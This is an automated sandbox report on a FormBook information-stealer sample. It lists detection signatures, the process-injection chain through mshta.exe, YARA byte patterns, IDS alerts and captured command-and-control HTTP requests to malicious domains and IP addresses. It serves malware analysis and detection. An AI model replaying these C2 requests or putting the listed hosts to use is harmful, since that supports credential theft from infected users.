Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wavjjT3sEq.exe

Overview

General Information

Sample name:wavjjT3sEq.exe
renamed because original name is a hash value
Original sample name:18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62.exe
Analysis ID:1554612
MD5:ea8d328ba326e4f6c37f0d853f981122
SHA1:6fdba2e03847634b20f105d0a3ff29348701c8c8
SHA256:18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62
Tags:exewww-vasehu-xyzuser-JAMESWT_MHT
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wavjjT3sEq.exe (PID: 4200 cmdline: "C:\Users\user\Desktop\wavjjT3sEq.exe" MD5: EA8D328BA326E4F6C37F0D853F981122)
    • tIEQBQsFNUYr.exe (PID: 5300 cmdline: "C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • mshta.exe (PID: 6336 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • tIEQBQsFNUYr.exe (PID: 6320 cmdline: "C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 5924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.wavjjT3sEq.exe.120000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.wavjjT3sEq.exe.120000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e813:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16862:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-12T18:33:31.413900+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849706TCP
          2024-11-12T18:34:10.131403+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849718TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-12T18:33:43.956038+010028554651A Network Trojan was detected192.168.2.84971335.156.117.13180TCP
          2024-11-12T18:34:07.739792+010028554651A Network Trojan was detected192.168.2.8497173.33.130.19080TCP
          2024-11-12T18:34:30.597777+010028554651A Network Trojan was detected192.168.2.8497223.33.130.19080TCP
          2024-11-12T18:34:45.340269+010028554651A Network Trojan was detected192.168.2.849783206.119.82.13480TCP
          2024-11-12T18:34:59.204438+010028554651A Network Trojan was detected192.168.2.849831162.213.249.21680TCP
          2024-11-12T18:35:13.682504+010028554651A Network Trojan was detected192.168.2.849885217.160.0.23180TCP
          2024-11-12T18:35:28.090174+010028554651A Network Trojan was detected192.168.2.84996154.179.173.6080TCP
          2024-11-12T18:35:41.457326+010028554651A Network Trojan was detected192.168.2.8500073.33.130.19080TCP
          2024-11-12T18:36:03.668475+010028554651A Network Trojan was detected192.168.2.850011156.226.22.23380TCP
          2024-11-12T18:36:17.395127+010028554651A Network Trojan was detected192.168.2.85001552.20.84.6280TCP
          2024-11-12T18:36:32.063113+010028554651A Network Trojan was detected192.168.2.8537543.33.130.19080TCP
          2024-11-12T18:36:45.965548+010028554651A Network Trojan was detected192.168.2.853758142.250.185.17980TCP
          2024-11-12T18:37:07.373757+010028554651A Network Trojan was detected192.168.2.853762172.81.61.22480TCP
          2024-11-12T18:37:22.563162+010028554651A Network Trojan was detected192.168.2.8537663.33.130.19080TCP
          2024-11-12T18:37:32.004901+010028554651A Network Trojan was detected192.168.2.85376735.156.117.13180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-12T18:34:00.030555+010028554641A Network Trojan was detected192.168.2.8497143.33.130.19080TCP
          2024-11-12T18:34:02.649993+010028554641A Network Trojan was detected192.168.2.8497153.33.130.19080TCP
          2024-11-12T18:34:05.195958+010028554641A Network Trojan was detected192.168.2.8497163.33.130.19080TCP
          2024-11-12T18:34:21.637687+010028554641A Network Trojan was detected192.168.2.8497193.33.130.19080TCP
          2024-11-12T18:34:24.294717+010028554641A Network Trojan was detected192.168.2.8497203.33.130.19080TCP
          2024-11-12T18:34:26.917164+010028554641A Network Trojan was detected192.168.2.8497213.33.130.19080TCP
          2024-11-12T18:34:37.402392+010028554641A Network Trojan was detected192.168.2.849747206.119.82.13480TCP
          2024-11-12T18:34:40.480678+010028554641A Network Trojan was detected192.168.2.849762206.119.82.13480TCP
          2024-11-12T18:34:42.611762+010028554641A Network Trojan was detected192.168.2.849770206.119.82.13480TCP
          2024-11-12T18:34:51.307912+010028554641A Network Trojan was detected192.168.2.849806162.213.249.21680TCP
          2024-11-12T18:34:53.923000+010028554641A Network Trojan was detected192.168.2.849815162.213.249.21680TCP
          2024-11-12T18:34:56.552188+010028554641A Network Trojan was detected192.168.2.849822162.213.249.21680TCP
          2024-11-12T18:35:05.183868+010028554641A Network Trojan was detected192.168.2.849850217.160.0.23180TCP
          2024-11-12T18:35:07.821672+010028554641A Network Trojan was detected192.168.2.849860217.160.0.23180TCP
          2024-11-12T18:35:10.528161+010028554641A Network Trojan was detected192.168.2.849872217.160.0.23180TCP
          2024-11-12T18:35:20.340272+010028554641A Network Trojan was detected192.168.2.84992154.179.173.6080TCP
          2024-11-12T18:35:22.840113+010028554641A Network Trojan was detected192.168.2.84993554.179.173.6080TCP
          2024-11-12T18:35:25.465126+010028554641A Network Trojan was detected192.168.2.84994854.179.173.6080TCP
          2024-11-12T18:35:33.829472+010028554641A Network Trojan was detected192.168.2.8499893.33.130.19080TCP
          2024-11-12T18:35:36.354898+010028554641A Network Trojan was detected192.168.2.8499993.33.130.19080TCP
          2024-11-12T18:35:38.903628+010028554641A Network Trojan was detected192.168.2.8500063.33.130.19080TCP
          2024-11-12T18:35:55.781092+010028554641A Network Trojan was detected192.168.2.850008156.226.22.23380TCP
          2024-11-12T18:35:58.435367+010028554641A Network Trojan was detected192.168.2.850009156.226.22.23380TCP
          2024-11-12T18:36:01.027844+010028554641A Network Trojan was detected192.168.2.850010156.226.22.23380TCP
          2024-11-12T18:36:09.724598+010028554641A Network Trojan was detected192.168.2.85001252.20.84.6280TCP
          2024-11-12T18:36:12.298490+010028554641A Network Trojan was detected192.168.2.85001352.20.84.6280TCP
          2024-11-12T18:36:14.833492+010028554641A Network Trojan was detected192.168.2.85001452.20.84.6280TCP
          2024-11-12T18:36:24.358877+010028554641A Network Trojan was detected192.168.2.8537513.33.130.19080TCP
          2024-11-12T18:36:26.934226+010028554641A Network Trojan was detected192.168.2.8537523.33.130.19080TCP
          2024-11-12T18:36:29.471616+010028554641A Network Trojan was detected192.168.2.8537533.33.130.19080TCP
          2024-11-12T18:36:38.325576+010028554641A Network Trojan was detected192.168.2.853755142.250.185.17980TCP
          2024-11-12T18:36:40.918665+010028554641A Network Trojan was detected192.168.2.853756142.250.185.17980TCP
          2024-11-12T18:36:43.487336+010028554641A Network Trojan was detected192.168.2.853757142.250.185.17980TCP
          2024-11-12T18:36:52.687626+010028554641A Network Trojan was detected192.168.2.853759172.81.61.22480TCP
          2024-11-12T18:36:55.293841+010028554641A Network Trojan was detected192.168.2.853760172.81.61.22480TCP
          2024-11-12T18:36:57.840790+010028554641A Network Trojan was detected192.168.2.853761172.81.61.22480TCP
          2024-11-12T18:37:13.050869+010028554641A Network Trojan was detected192.168.2.8537633.33.130.19080TCP
          2024-11-12T18:37:15.611386+010028554641A Network Trojan was detected192.168.2.8537643.33.130.19080TCP
          2024-11-12T18:37:18.163807+010028554641A Network Trojan was detected192.168.2.8537653.33.130.19080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: wavjjT3sEq.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.40wxd.top/xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg==Avira URL Cloud: Label: malware
          Source: http://www.40wxd.top/xqel/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted file
          Source: wavjjT3sEq.exeReversingLabs: Detection: 71%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: wavjjT3sEq.exeJoe Sandbox ML: detected
          Source: wavjjT3sEq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: wavjjT3sEq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: mshta.pdbGCTL source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tIEQBQsFNUYr.exe, 00000002.00000000.1520159882.000000000100E000.00000002.00000001.01000000.00000004.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3911627042.000000000100E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wavjjT3sEq.exe, wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshta.pdb source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4C6D0 FindFirstFileW,FindNextFileW,FindClose,3_2_02F4C6D0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then xor eax, eax3_2_02F39BB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then mov ebx, 00000004h3_2_037004E8

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 35.156.117.131:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49722 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49762 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49770 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49717 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49806 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49783 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49831 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49815 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49822 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49850 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49860 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49872 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49885 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49935 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49961 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49921 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49948 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50008 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49989 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50010 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50011 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53752 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53766 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53751 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50015 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53756 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53754 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53764 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53767 -> 35.156.117.131:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53760 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53758 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50012 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53763 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53762 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49999 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53755 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53753 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53761 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53759 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50009 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53757 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50013 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53765 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50014 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50007 -> 3.33.130.190:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.vasehub.xyz
          Source: DNS query: www.moritynomxd.xyz
          Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
          Source: Joe Sandbox ViewIP Address: 35.156.117.131 35.156.117.131
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49706
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49718
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1Host: www.specialgift.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /lclg/?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.filelabel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
